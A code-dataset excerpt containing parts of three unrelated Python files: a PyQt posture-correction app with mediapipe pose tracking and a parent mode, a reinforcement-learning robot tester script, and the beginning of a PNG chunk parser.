delt_code_1_1:\n time_11 += 1\n if time_11 > waiting_time:\n print(code_11)\n pygame.mixer.music.load(\"Voices/code_11.mp3\")\n pygame.mixer.music.play()\n pygame.time.wait(2000)\n pygame.mixer.music.stop()\n time_11 = 0\n else:\n time_11 = 0\n count += 1\n\n # приблизительно одна прямая уха и носа\n\n if abs(nose[1] - right_ear[1]) > delt_code_1_2 or abs(nose[1] - left_ear[1]) > delt_code_1_2:\n time_12 += 1\n if time_12 > waiting_time:\n print(code_12)\n pygame.mixer.music.load(\"Voices/code_12.mp3\")\n pygame.mixer.music.play()\n pygame.time.wait(2000)\n pygame.mixer.music.stop()\n time_12 = 0\n else:\n time_12 = 0\n count += 1\n\n # ---------------------------------------------------------------------------------4 контроль ног\n\n # считаем угол по трем точкам\n angle_l_foot = calculate_angle(left_hip, left_knee, left_ankle)\n angle_r_foot = calculate_angle(right_hip, right_knee, right_ankle)\n\n # выводим угол в поток изображения\n\n if angle_l_foot > delt_angle_max or angle_l_foot < delt_angle_min or angle_r_foot > delt_angle_max or angle_r_foot < delt_angle_min:\n time_4 += 1\n if time_4 > waiting_time:\n print(code_4)\n pygame.mixer.music.load(\"Voices/code_4.mp3\")\n pygame.mixer.music.play()\n pygame.time.wait(4000)\n pygame.mixer.music.stop()\n time_4 = 0\n else:\n time_4 = 0\n count += 1\n\n\n except: # если у нас есть не все точки или появилась какая-то ошибка, то мы не разрываем цикл, а просто его пропускаем\n pass\n\n # рисуем в image результаты обнаружения (точки) и соединения, устанавливая цвет и размеры\n mp_drawing.draw_landmarks(image, results.pose_landmarks, mp_pose.POSE_CONNECTIONS,\n mp_drawing.DrawingSpec(color=(245, 117, 66), thickness=2, circle_radius=2),\n mp_drawing.DrawingSpec(color=(245, 66, 230), thickness=2, circle_radius=2)\n )\n\n cv2.imshow('Mediapipe Feed', image)\n if cv2.waitKey(10) & 0xFF == ord('q'):\n break\n\n\n cv2.destroyAllWindows()\n\n\nclass PageMain(QWidget):\n def __init__(self):\n super().__init__()\n self.init_ui()\n\n def init_ui(self):\n self.setStyleSheet(\"background-color: #264653;\")\n self.setGeometry(0, 0, WIDTH, HEIGHT)\n self.setWindowTitle('Коррекция осанки')\n\n self.btn_progress = QPushButton(\"Посмотреть прогресс\", self)\n self.btn_progress.setGeometry(WIDTH / 2 + 100, HEIGHT / 2 + 50, WIDTH - 200 - WIDTH / 2, 50)\n font = QtGui.QFont()\n font.setFamily(\"MS Reference Sans Serif\")\n font.setPointSize(12)\n font.setBold(True)\n font.setWeight(75)\n self.btn_progress.setFont(font)\n self.btn_progress.setStyleSheet(\"background-color: #f4a261;\\n\"\n \"border-radius: 10px;\")\n self.btn_progress.setObjectName(\"btn_progress\")\n self.btn_progress.clicked.connect(self.open_page_progress)\n\n self.btn_do_exer = QPushButton('Выполнить упражнения', self)\n self.btn_do_exer.setGeometry(WIDTH / 2 + 100, HEIGHT / 2 + 110, WIDTH - 200 - WIDTH / 2, 50)\n font = QtGui.QFont()\n font.setFamily(\"MS Reference Sans Serif\")\n font.setPointSize(12)\n font.setBold(True)\n font.setWeight(75)\n self.btn_do_exer.setFont(font)\n self.btn_do_exer.setStyleSheet(\"background-color: #f4a261;\\n\"\n \"border-radius: 10px;\")\n self.btn_do_exer.setObjectName(\"btn_do_exer\")\n self.btn_do_exer.clicked.connect(self.open_page_exercise)\n\n self.btn_parent = QPushButton(\"Родительский режим\", self)\n self.btn_parent.setGeometry(WIDTH / 2 + 100, HEIGHT / 2 + 170, WIDTH - 200 - WIDTH / 2, 50)\n font = QtGui.QFont()\n font.setFamily(\"MS Reference Sans Serif\")\n font.setPointSize(12)\n font.setBold(True)\n font.setWeight(75)\n self.btn_parent.setFont(font)\n self.btn_parent.setStyleSheet(\"background-color: #e9c46a;\\n\"\n \"border-radius: 10px;\")\n self.btn_parent.setObjectName(\"btn_parent\")\n self.btn_parent.clicked.connect(self.open_page_input_pw)\n\n self.lbl_molod = QLabel('Ты сегодня сидишь правильно ' + str(my_time) + ' минут!', self)\n self.lbl_molod.setGeometry(WIDTH / 2 + 120, HEIGHT / 2 - 50, WIDTH - 180 - WIDTH / 2, 30)\n font = QtGui.QFont()\n font.setFamily(\"MS Reference Sans Serif\")\n font.setPointSize(14)\n font.setBold(True)\n font.setWeight(75)\n self.lbl_molod.setFont(font)\n self.lbl_molod.setStyleSheet(\"color: #ffffff\")\n self.lbl_molod.setObjectName(\"lbl_molod\")\n\n self.btn_start = QPushButton('CТАРТ', self)\n self.btn_start.setStyleSheet(\"background-color: #2a9d8f;\"\n \"color: rgb(255, 255, 255);\"\n \"border-radius: 10px;\")\n self.btn_start.setGeometry(WIDTH / 2 + 100, HEIGHT / 2 - 250, 200, 70)\n font = QtGui.QFont()\n font.setFamily(\"MS Reference Sans Serif\")\n font.setPointSize(18)\n font.setBold(True)\n font.setWeight(75)\n self.btn_start.setFont(font)\n self.btn_start.setObjectName(\"btn_start\")\n self.btn_start.clicked.connect(self.push_on)\n\n self.btn_stop = QPushButton('СТОП', self)\n self.btn_stop.setStyleSheet(\"background-color: #e76f51;\"\n \"color: #ffffff;\"\n \"border-radius: 10px;\")\n self.btn_stop.setGeometry(WIDTH - 100 - 200, HEIGHT / 2 - 250, 200, 70)\n font = QtGui.QFont()\n font.setFamily(\"MS Reference Sans Serif\")\n font.setBold(True)\n font.setPointSize(18)\n font.setWeight(75)\n self.btn_stop.setFont(font)\n self.btn_stop.setObjectName(\"btn_stop\")\n self.btn_stop.clicked.connect(self.push_off)\n\n\n self.lbl_transl = QLabel(\"Трансляция\", self)\n # self.lbl_transl.resize(640, 480)\n self.lbl_transl.move(60, 60)\n font = QtGui.QFont()\n font.setFamily(\"MS Reference Sans Serif\")\n font.setPointSize(12)\n font.setBold(True)\n font.setWeight(75)\n self.lbl_transl.setFont(font)\n self.lbl_transl.setStyleSheet(\"color: #ffffff;\")\n self.lbl_transl.setObjectName(\"lbl_transl\")\n\n self.lbl_video = QLabel(\"Видео-поток\", self)\n self.lbl_video.setFixedSize(WIDTH / 2 - 20, HEIGHT - 50)\n\n layout = QVBoxLayout()\n layout.addWidget(self.lbl_video)\n self.setLayout(layout)\n\n self.camera = global_cap\n self.timer = QtCore.QTimer(self)\n self.timer.timeout.connect(self.update_video_stream)\n self.timer.start(30)\n\n def update_video_stream(self):\n # Чтение кадра видео\n\n ret, frame = self.camera.read()\n if ret:\n # Преобразование кадра в формат QImage\n frame_rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n image = QtGui.QImage(\n frame_rgb.data, frame_rgb.shape[1], frame_rgb.shape[0], QtGui.QImage.Format_RGB888\n )\n # Отображение кадра на виджете QLabel\n self.lbl_video.setPixmap(QtGui.QPixmap.fromImage(image))\n\n else:\n self.timer.stop()\n\n def push_on(self):\n global FLAG\n FLAG = True\n skeleton_recognition()\n\n\n def push_off(self):\n global FLAG_DATE\n global count\n global my_time\n global day\n global today\n global exercise_count\n my_time = int(my_time)\n my_time += int(count / 2000)\n count = 0\n\n if FLAG_DATE:\n with open(\"data.csv\", \"a\", newline=\"\") as file:\n writer = csv.writer(file)\n writer.writerow([day, today, my_time, exercise_count])\n FLAG_DATE = False\n else:\n with open(\"data.csv\", \"r\") as file:\n reader = csv.reader(file)\n lines = list(reader)\n lines[-1] = [day, today, my_time, exercise_count]\n\n with open(\"data.csv\", \"w\", newline=\"\") as file:\n writer = csv.writer(file)\n writer.writerows(lines)\n\n global FLAG\n FLAG = False\n print(FLAG)\n\n\n\n\n def open_page_exercise(self):\n self.page_exercise = PageExercise()\n self.page_exercise.show()\n self.hide()\n\n def open_page_progress(self):\n self.page_progress = PageProgress()\n self.page_progress.show()\n self.hide()\n\n def open_page_input_pw(self):\n self.page_input_pw = PageInputPassword()\n self.page_input_pw.show()\n self.hide()\n\n\nclass PageExercise(QWidget):\n def __init__(self):\n super().__init__()\n self.init_ui()\n\n def init_ui(self):\n self.setStyleSheet(\"background-color: #264653;\")\n self.setGeometry(0, 0, WIDTH, HEIGHT)\n self.setWindowTitle('Упражнения')\n\n self.btn_back = QPushButton(\"Назад\", self)\n font = QtGui.QFont()\n font.setFamily(\"MS Reference Sans Serif\")\n font.setPointSize(18)\n font.setWeight(75)\n self.btn_back.setFont(font)\n self.btn_back.setStyleSheet(\"background-color: #e9c46a;\\n\"\n \"border-radius: 10px;\")\n self.btn_back.clicked.connect(self.open_main_page)\n\n # Создание кнопок \"Старт\" и \"Стоп\"\n self.btn_start = QPushButton('Cтарт', self)\n self.btn_start.setStyleSheet(\"background-color: #2a9d8f;\"\n \"color: rgb(255, 255, 255);\"\n \"border-radius: 10px;\")\n self.btn_start.resize(100, 30)\n font = QtGui.QFont()\n font.setFamily(\"MS Reference Sans Serif\")\n font.setPointSize(18)\n font.setBold(True)\n font.setWeight(75)\n self.btn_start.setFont(font)\n self.btn_start.setObjectName(\"btn_start\")\n self.btn_start.clicked.connect(self.start_recording)\n\n self.btn_stop = QPushButton('Стоп', self)\n self.btn_stop.setStyleSheet(\"background-color: #e76f51;\"\n \"color: #ffffff;\"\n \"border-radius: 10px;\")\n self.btn_stop.resize(100, 30)\n font = QtGui.QFont()\n font.setFamily(\"MS Reference Sans Serif\")\n font.setBold(True)\n font.setPointSize(18)\n font.setWeight(75)\n self.btn_stop.setFont(font)\n self.btn_stop.setObjectName(\"btn_stop\")\n self.btn_stop.clicked.connect(self.stop_recording)\n\n # создание виджета для вывода видео-потока\n self.videoWidget = QLabel(self)\n self.videoWidget.resize(640, 480)\n\n # создание главного вертикального лэйаута\n self.vbox = QVBoxLayout()\n self.vbox.addWidget(self.btn_start)\n self.vbox.addWidget(self.btn_stop)\n self.vbox.addWidget(self.btn_back)\n self.vbox.addWidget(self.videoWidget)\n\n # установка лэйаута в окно\n self.setLayout(self.vbox)\n\n def start_recording(self):\n # создание объекта захвата видео с камеры\n self.cap = global_cap\n\n # создание объекта записи видео в формате AVI\n fourcc = cv2.VideoWriter_fourcc(*'XVID')\n self.out = cv2.VideoWriter((str(dt.datetime.now().date()) + str(dt.datetime.now().time()))[:12] + \".avi\",\n fourcc, 20.0, (640, 480))\n\n # запуск цикла чтения и записи кадров с камеры\n while (self.cap.isOpened()):\n ret, frame = self.cap.read()\n if ret == True:\n # вывод кадра на виджет\n frame_rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n img = QtGui.QImage(\n frame_rgb.data, frame_rgb.shape[1], frame_rgb.shape[0], QtGui.QImage.Format_RGB888\n )\n self.videoWidget.setPixmap(QPixmap.fromImage(img))\n\n # запись кадра в файл\n self.out.write(frame)\n\n # обновление виджета\n QApplication.processEvents()\n else:\n break\n\n def stop_recording(self):\n # остановка записи видео в файл\n self.out.release()\n\n\n def open_main_page(self):\n self.page_main = PageMain()\n self.page_main.show()\n self.hide()\n\n\nclass PageProgress(QWidget):\n def __init__(self):\n super().__init__()\n self.init_ui()\n\n def init_ui(self):\n self.setStyleSheet(\"background-color: #264653;\")\n self.setGeometry(0, 0, WIDTH, HEIGHT)\n self.setWindowTitle('Прогресс')\n\n self.lbl_today = QLabel('СЕГОДНЯ', self)\n self.lbl_today.setGeometry(WIDTH/2 + WIDTH/4 - 70, 70, WIDTH - 180 - WIDTH / 2, 30)\n font = QtGui.QFont()\n font.setFamily(\"MS Reference Sans Serif\")\n font.setPointSize(18)\n font.setBold(True)\n font.setWeight(75)\n self.lbl_today.setFont(font)\n self.lbl_today.setStyleSheet(\"color: #f4a261;\")\n self.lbl_today.setObjectName(\"lbl_today\")\n\n self.lbl_str_exer = QLabel('Количество упражнений для осанки', self)\n self.lbl_str_exer.setGeometry(WIDTH/2 + 100, 200, WIDTH - 180 - WIDTH / 2, 30)\n font = QtGui.QFont()\n font.setFamily(\"MS Reference Sans Serif\")\n font.setPointSize(14)\n font.setBold(True)\n font.setWeight(75)\n self.lbl_str_exer.setFont(font)\n self.lbl_str_exer.setStyleSheet(\"color: #ffffff;\")\n self.lbl_str_exer.setObjectName(\"lbl_str_exer\")\n\n self.lbl_count_exer = QLabel(str(exercise_count), self) # счетчик упражнений\n self.lbl_count_exer.setGeometry(WIDTH/2 + WIDTH/4 - 50, 280, 100, 60)\n font = QtGui.QFont()\n font.setFamily(\"MS Reference Sans Serif\")\n font.setPointSize(33)\n font.setBold(True)\n font.setWeight(75)\n self.lbl_count_exer.setFont(font)\n self.lbl_count_exer.setStyleSheet(\"color: #2a9d8f;\")\n self.lbl_count_exer.setObjectName(\"lbl_count_exer\")\n\n self.lbl_str_time = QLabel('Количество минут правильной осанки ', self)\n self.lbl_str_time.setGeometry(WIDTH/2 + 100, 380, WIDTH - 180 - WIDTH / 2, 30)\n font = QtGui.QFont()\n font.setFamily(\"MS Reference Sans Serif\")\n font.setPointSize(14)\n font.setBold(True)\n font.setWeight(75)\n self.lbl_str_time.setFont(font)\n self.lbl_str_time.setStyleSheet(\"color: #ffffff;\")\n self.lbl_str_time.setObjectName(\"lbl_str_time\")\n\n self.lbl_count_time = QLabel(str(my_time), self) # счетчик времени\n self.lbl_count_time.setGeometry(WIDTH/2 + WIDTH/4 - 50, 460, 100, 60)\n font = QtGui.QFont()\n font.setFamily(\"MS Reference Sans Serif\")\n font.setPointSize(33)\n font.setBold(True)\n font.setWeight(75)\n self.lbl_count_time.setFont(font)\n self.lbl_count_time.setStyleSheet(\"color: #2a9d8f;\")\n self.lbl_count_time.setObjectName(\"lbl_count_time\")\n\n self.btn_back = QPushButton(\"Назад\", self)\n self.btn_back.setGeometry(WIDTH - 120 - 40, HEIGHT - 100 - 50, 120, 50)\n font = QtGui.QFont()\n font.setFamily(\"MS Reference Sans Serif\")\n font.setPointSize(12)\n font.setWeight(75)\n self.btn_back.setFont(font)\n self.btn_back.setStyleSheet(\"background-color: #e76f51;\\n\"\n \"border-radius: 10px;\")\n self.btn_back.clicked.connect(self.open_main_page)\n\n self.lbl_graf_exer = QLabel(\"График упражнений\", self)\n self.lbl_graf_exer.setFixedSize(WIDTH / 2 - 20, HEIGHT - 50)\n\n layout = QVBoxLayout()\n layout.addWidget(self.lbl_graf_exer)\n self.setLayout(layout)\n\n data = pd.read_csv('data.csv')\n plt.plot(data['Day'], data['Exercises'])\n plt.xlabel('Day')\n plt.xlabel('Exercises')\n\n plt.savefig('graf_exer.png')\n\n pixmap = QPixmap('graf_exer.png')\n self.lbl_graf_exer.setPixmap(pixmap)\n\n\n\n def open_main_page(self):\n self.page_main = PageMain()\n self.page_main.show()\n self.hide()\n\n\nclass PageInputPassword(QWidget):\n def __init__(self):\n super().__init__()\n self.init_ui()\n\n def init_ui(self):\n self.setStyleSheet(\"background-color: #264653;\")\n self.setGeometry(WIDTH / 2 - 200, 200, 400, 200)\n self.setWindowTitle(\"Ввод пароля\")\n\n self.lbl_password = QLabel('Введите пароль: ', self)\n self.lbl_password.setGeometry(50, 70, 1300, 30)\n font = QtGui.QFont()\n font.setFamily(\"MS Reference Sans Serif\")\n font.setPointSize(8)\n font.setWeight(75)\n self.lbl_password.setFont(font)\n self.lbl_password.setStyleSheet(\"color: #ffffff;\")\n\n self.lned_input_pw = QLineEdit(self)\n self.lned_input_pw.setEchoMode(QLineEdit.Password)\n self.lned_input_pw.setGeometry(210, 70, 110, 20)\n self.lned_input_pw.setStyleSheet(\"color: #ffffff;\")\n\n self.btn_submit = QPushButton('Отправить', self)\n self.btn_submit.setGeometry(150, 130, 110, 30)\n font = QtGui.QFont()\n font.setFamily(\"MS Reference Sans Serif\")\n font.setPointSize(8)\n font.setWeight(75)\n self.btn_submit.setFont(font)\n self.btn_submit.setStyleSheet(\"background-color: #e9c46a;\\n\"\n \"border-radius: 10px;\")\n self.btn_submit.clicked.connect(self.check_password)\n\n self.btn_back = QPushButton(\"Назад\", self)\n self.btn_back.setGeometry(320, 160, 70, 30)\n font = QtGui.QFont()\n font.setFamily(\"MS Reference Sans Serif\")\n font.setPointSize(8)\n font.setWeight(75)\n self.btn_back.setFont(font)\n self.btn_back.setStyleSheet(\"background-color: #e76f51;\\n\"\n \"border-radius: 10px;\")\n self.btn_back.clicked.connect(self.open_main_page)\n\n def open_main_page(self):\n self.page_main = PageMain()\n self.page_main.show()\n self.hide()\n\n def check_password(self):\n password = self.lned_input_pw.text()\n\n if password == '1234':\n self.open_page_parent()\n else:\n error = QMessageBox()\n # error.se\n error.setWindowTitle(\"Ошибка доступа\")\n error.setText('Введен неверный пароль')\n error.setIcon(QMessageBox.Warning)\n error.setStandardButtons(QMessageBox.Ok)\n error.buttonClicked.connect(self.popup_action)\n error.exec_()\n # QMessageBox.warning(self, \"Ошибка доступа\", 'Введен не верный пароль')\n\n def popup_action(self, btn):\n # self.lbl_password.setText('')\n self.lned_input_pw.setText('')\n # print(\"print ok\")\n\n def open_page_parent(self):\n self.page_parent = PageParent()\n self.page_parent.show()\n self.hide()\n\n\nclass PageParent(QWidget):\n def __init__(self):\n super().__init__()\n self.init_ui()\n\n def init_ui(self):\n self.setStyleSheet(\"background-color: #264653;\")\n self.setGeometry(0, 0, WIDTH, HEIGHT)\n self.setWindowTitle('Родительский режим')\n\n self.btn_back = QPushButton(\"Назад\", self)\n self.btn_back.setGeometry(WIDTH - 120 - 40, HEIGHT - 100 - 50, 120, 50)\n font = QtGui.QFont()\n font.setFamily(\"MS Reference Sans Serif\")\n font.setPointSize(12)\n font.setWeight(75)\n self.btn_back.setFont(font)\n self.btn_back.setStyleSheet(\"background-color: #f4a261;\\n\"\n \"border-radius: 10px;\")\n self.btn_back.clicked.connect(self.open_main_page)\n\n # Создание кнопки \"Посмотреть\"\n self.btn_play = QPushButton('Посмотреть', self)\n self.btn_play.setGeometry(WIDTH / 2 + 100, HEIGHT / 2 - 250, WIDTH - 200 - WIDTH / 2, 70)\n font = QtGui.QFont()\n font.setFamily(\"MS Reference Sans Serif\")\n font.setPointSize(12)\n font.setWeight(75)\n self.btn_play.setFont(font)\n self.btn_play.setStyleSheet(\"background-color: #e9c46a;\\n\"\n \"border-radius: 10px;\")\n self.btn_play.clicked.connect(self.play_video)\n # Создание кнопки \"Принять\"\n self.btn_accept = QPushButton('Принять', self)\n self.btn_accept.setGeometry(WIDTH / 2 + 100, HEIGHT / 2 - 150, 200, 70)\n font = QtGui.QFont()\n font.setFamily(\"MS Reference Sans Serif\")\n font.setPointSize(12)\n font.setWeight(75)\n self.btn_accept.setFont(font)\n self.btn_accept.setStyleSheet(\"background-color: #2a9d8f;\\n\"\n \"border-radius: 10px;\")\n self.btn_accept.clicked.connect(self.count_exercise)\n\n # Создание кнопки \"Отклонить\"\n self.btn_reject = QPushButton('Отклонить', self)\n self.btn_reject.setGeometry(WIDTH - 100 - 200, HEIGHT / 2 - 150, 200, 70)\n font = QtGui.QFont()\n font.setFamily(\"MS Reference Sans Serif\")\n font.setPointSize(12)\n font.setWeight(75)\n self.btn_reject.setFont(font)\n self.btn_reject.setStyleSheet(\"background-color: #e76f51;\\n\"\n \"border-radius: 10px;\")\n # !!!!!self.btn_reject.clicked.connect(self.play_video)\n\n # Создание метки для отображения видео-потока\n self.lbl_video = QLabel(\"Видео-поток\", self)\n self.lbl_video.setFixedSize(WIDTH / 2 - 20, HEIGHT - 50)\n self.lbl_video.resize(640, 480)\n self.lbl_video.move(50, 50)\n\n # Инициализация переменных\n self.cap = None\n\n def count_exercise(self):\n global FLAG_DATE\n global my_time\n global day\n global today\n global exercise_count\n exercise_count = int(exercise_count)\n exercise_count += 1\n\n if FLAG_DATE:\n with open(\"data.csv\", \"a\", newline=\"\") as file:\n writer = csv.writer(file)\n writer.writerow([day, today, my_time, exercise_count])\n FLAG_DATE = False\n else:\n with open(\"data.csv\", \"r\") as file:\n reader = csv.reader(file)\n lines = list(reader)\n lines[-1] = [day, today, my_time, exercise_count]\n\n with open(\"data.csv\", \"w\", newline=\"\") as file:\n writer = csv.writer(file)\n writer.writerows(lines)\n\n\n\n\n def play_video(self):\n # Выбор файла видео\n filename, _ = QFileDialog.getOpenFileName(self, 'Выберите файл', '', 'Видео (*.avi)')\n if filename:\n # Открытие файла видео\n self.cap = cv2.VideoCapture(filename)\n # Чтение и отображение кадров видео-потока в метке\n while True:\n ret, frame = self.cap.read()\n if ret:\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n h, w, ch = frame.shape\n bytes_per_line = ch * w\n q_image = QImage(frame.data, w, h, bytes_per_line, QImage.Format_RGB888)\n pixmap = QPixmap.fromImage(q_image)\n self.lbl_video.setPixmap(pixmap)\n QApplication.processEvents() # Обновление интерфейса\n else:\n break\n self.cap.release()\n\n def open_main_page(self):\n self.page_main = PageMain()\n self.page_main.show()\n self.hide()\n\n\nif __name__ == \"__main__\":\n global_cap = cv2.VideoCapture(0)\n app = QApplication(sys.argv)\n main_page = PageMain()\n main_page.show()\n pygame.mixer.music.load(\"Voices/start.mp3\")\n pygame.mixer.music.play()\n pygame.time.wait(3000)\n pygame.mixer.music.stop()\n sys.exit((app.exec_(), global_cap.release(), pygame.quit()))\n","repo_name":"Sofia-Oleynik/Practice-2023","sub_path":"Project/main/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":34811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"75247508206","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Nov 16 15:50:55 2020\n\n@author: Enrico Regolin\n\"\"\"\n\n# tester robot\nimport os, sys\n\nfrom asynch_rl.rl.rl_env import Multiprocess_RL_Environment\nfrom asynch_rl.rl.utilities import clear_pycache, load_train_params\n\nimport sys\nimport psutil\nimport time\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\n\nimport asyncio\n\n#####\nfrom argparse import ArgumentParser\n\nparser = ArgumentParser()\n\nparser.add_argument(\"-v\", \"--version\", dest=\"net_version\", type = int, default= 200 , help=\"training version\")\n\nparser.add_argument(\"-i\", \"--iter\" , dest=\"iteration\" , type = int, default= -1 , help=\"iteration\")\n\nparser.add_argument(\"-sim\", \"--simulate\" , dest=\"simulate\" , type=lambda x: (str(x).lower() in ['true','1', 'yes']), default= False , help=\"simulate instance\")\n\nparser.add_argument(\"-d\", \"--difficulty\" , dest=\"difficulty\" , type = int, default= 2 , help=\"difficulty\")\n\nparser.add_argument(\"-s\", \"--save-movie\" , dest=\"save_movie\" , type=lambda x: (str(x).lower() in ['true','1', 'yes']), default= True , help=\"save movie\")\n\nparser.add_argument(\"-e\", \"--eps-format\" , dest=\"eps_format\" , type=lambda x: (str(x).lower() in ['true','1', 'yes']), default= False , help=\"eps_format\")\n\nparser.add_argument(\"-dt\", \"--step-size\" , dest=\"step_size\" , type = float, default= 0.4 , help=\"simulation step size\")\n\nargs = parser.parse_args()\n################\n\n\n# generate proper discretized bins structure\n\ndef main(net_version = 100, iteration = 2, simulate = False, difficulty = 0, save_movie = False, eps_format = False, step_size = 0.4):\n\n ################\n env_type = 'RobotEnv' \n model_type = 'ConvModel'\n #rl_mode = 'AC'\n \n overwrite_params = ['rewards', 'rl_mode', 'share_conv_layers', 'n_frames' ,\\\n 'layers_width', 'map_output', 'normalize_layers', \\\n 'val_frequency']\n \n my_dict = load_train_params(env_type, model_type, overwrite_params, net_version)\n local_vars = locals()\n \n for i,par in enumerate(overwrite_params):\n #exec(par + \" = my_dict['\" + par + \"']\", None, )\n local_vars[par] = my_dict[par]\n del( overwrite_params, my_dict)\n \n \n \n ################\n \"\"\"\n my_vars = locals().copy()\n for v in my_vars:\n print(v)\n \"\"\"\n import inspect\n inspect.signature(Multiprocess_RL_Environment.__init__)\n \n \n rl_env = Multiprocess_RL_Environment(env_type, model_type, net_version, rl_mode=local_vars['rl_mode'] , ray_parallelize=False, \\\n move_to_cuda=False, n_frames = local_vars['n_frames'], show_rendering = True, discr_env_bins=2,\\\n difficulty= difficulty, map_output = local_vars['map_output'], \\\n layers_width = local_vars['layers_width'], normalize_layers = local_vars['normalize_layers'] ,\\\n rewards=local_vars['rewards'], val_frequency=local_vars['val_frequency'], step_size = step_size) #, \\\n # #replay_memory_size = 500, N_epochs = 100)\n \n \n print(f'rl mode : {rl_env.rl_mode}')\n \n rl_env.save_movie = False\n rl_env.live_plot = False\n # always update agents params after rl_env params are changed\n rl_env.updateAgentsAttributesExcept('env')\n \n rl_env.load(iteration)\n #rl_env.load(320)\n \n rl_env.print_NN_parameters_count()\n \n try:\n fig0, fig = rl_env.plot_training_log(0, qv_loss_log = False, \\\n pg_loss_log = False, save_fig = save_movie, eps_format=eps_format)\n \n except Exception:\n print('incomplete data for plot generation')\n \n \n\n\n \n #%%\n # script to clean up val hist\n \n \"\"\"\n import numpy as np\n \n mask = np.ones(rl_env.val_history.shape[0], dtype = bool)\n mask[16:19] = False\n \n rl_env.val_history = rl_env.val_history[mask]\n \"\"\"\n \n \"\"\"\n #save it afterwards\n import os\n #path = os.path.dirname(os.path.abspath(__file__))\n path = os.getcwd()\n val_history_file = os.path.join(path, 'val_history.npy')\n np.save(val_history_file, rl_env.val_history )\n \"\"\"\n \n \n #\"\"\"\n \n #%%\n if simulate:\n agent = rl_env.sim_agents_discr[0]\n \n #agent.live_plot = True\n agent.max_steps_single_run = int(1000*0.4/step_size)\n \n #\n agent.movie_frequency = 1\n #agent.tot_iterations = 10000\n agent.tot_iterations = int(500*0.4/step_size)\n agent.max_n_single_runs = 5\n\n if save_movie:\n rl_env.update_net_name()\n agent.net_name = rl_env.net_name\n agent.save_movie = True\n agent.tot_iterations = int(2500*0.4/step_size)\n agent.max_n_single_runs = 10\n \n sim_log, single_runs , successful_runs,_,_, pg_info = agent.run_synch(use_NN = True, test_qv = False)\n \n if 'fig0' in locals():\n fig.waitforbuttonpress(20)\n fig0.waitforbuttonpress(20)\n #fig_st.waitforbuttonpress(20)\n\n \"\"\"\n stats = []\n n_samples = 40\n for i in range(1,n_samples):\n pctg_success = (round(100*rl_env.traj_stats[-i].count('success')/len(rl_env.traj_stats[-i])))\n stats.append(pctg_success)\n print(f'success percentage last {n_samples}: {sum(stats)/len(stats)}%')\n \"\"\"\n\n\n#%%\n################################################################\n\nif __name__ == \"__main__\":\n \n main(net_version = args.net_version, iteration = args.iteration, simulate = args.simulate, \\\n difficulty = args.difficulty, save_movie=args.save_movie, eps_format=args.eps_format, step_size = args.step_size)\n\n current_folder = os.path.abspath(os.path.dirname(__file__))\n clear_pycache(current_folder)\n\n","repo_name":"EnricoReg/asynch-rl","sub_path":"examples/Tester_robot.py","file_name":"Tester_robot.py","file_ext":"py","file_size_in_byte":5935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"32839985665","text":"from util.byte_util import getChar, getBigByte, getBigShort, getBigInt\n\ndef ihdr(file, start, size):\n i = start\n \n ptd, i = getBigInt(file, i)\n print('寬度:', ptd)\n\n ptd, i = getBigInt(file, i)\n print('長度:', ptd)\n\n ptd, i = getBigByte(file, i)\n print('位元深度:', ptd)\n\n color_type = {0: '灰階', 2: '真彩', 3: '索引色', 4: '帶alpha灰階', \n 6: '帶alpha真彩'}\n ptd, i = getBigByte(file, i)\n clr_type = ptd\n print('顏色種類:', color_type[clr_type], '({})'.format(clr_type))\n \n i = i + 2 # Skip 2 1-byte parameters\n\n il_type = {0: '無', 1: 'Adam7'}\n ptd, i = getBigByte(file, i)\n print('格行掃描方法:', il_type[ptd], '({})'.format(ptd))\n i = i + 4 # Skip 4-byte CRC\n return i, clr_type\n\ndef chrm(file, start):\n i = start\n\n ptd, i = getBigInt(file, i)\n print('白點 X:', ptd)\n\n ptd, i = getBigInt(file, i)\n print('白點 Y:', ptd)\n\n ptd, i = getBigInt(file, i)\n print('紅 X:', ptd)\n\n ptd, i = getBigInt(file, i)\n print('紅 Y:', ptd)\n\n ptd, i = getBigInt(file, i)\n print('綠 X:', ptd)\n\n ptd, i = getBigInt(file, i)\n print('綠 Y:', ptd)\n\n ptd, i = getBigInt(file, i)\n print('藍 X:', ptd)\n\n ptd, i = getBigInt(file, i)\n print('藍 Y:', ptd)\n \n i = i + 4 # Skip 4-byte CRC\n \n return i\n\ndef gama(file, start, size):\n i = start\n \n ptd, i = getBigInt(file, i)\n print('Gamma:', ptd)\n \n i = i + 4 # Skip 4-byte CRC\n \n return i\n\ndef iccp(file, start, size):\n i = start\n ptd = '0'\n profile = []\n \n while not ptd == '\\0':\n ptd, i = getChar(file, i)\n profile.append(ptd)\n print('Profile:', ''.join(profile))\n\n return start + size + 4\n\ndef sbit(file, start, size, clr_type):\n i = start\n \n if clr_type == 0:\n ptd, i = getBigByte(file, i)\n print('最高灰階有效位:', ptd)\n elif clr_type == 2 or clr_type == 3:\n ptd, i = getBigByte(file, i)\n print('最高紅色有效位:', ptd)\n \n ptd, i = getBigByte(file, i)\n print('最高綠色有效位:', ptd)\n \n ptd, i = getBigByte(file, i)\n print('最高藍色有效位:', ptd)\n elif clr_type == 4:\n ptd, i = getBigByte(file, i)\n print('最高灰階有效位:', ptd)\n \n ptd, i = getBigByte(file, i)\n print('最高alpha有效位:', ptd)\n elif clr_type == 6:\n ptd, i = getBigByte(file, i)\n print('最高紅色有效位:', ptd)\n \n ptd, i = getBigByte(file, i)\n print('最高綠色有效位:', ptd)\n \n ptd, i = getBigByte(file, i)\n print('最高藍色有效位:', ptd)\n \n ptd, i = getBigByte(file, i)\n print('最高alpha有效位:', ptd)\n \n return start + size + 4\n\ndef text(file, start, size):\n i = start\n keyword = []\n text = []\n \n while not ptd == '\\0':\n ptd, i = getChar(file, i)\n keyword.append(ptd)\n keyword = ''.join(keyword)\n \n while not i == start + size + 4:\n ptd, i = getChar(file, i)\n text.append(ptd)\n text = ''.join(text)\n print(keyword + ':', text)\n \n return start + size + 4\n\ndef ztxt(file, start, 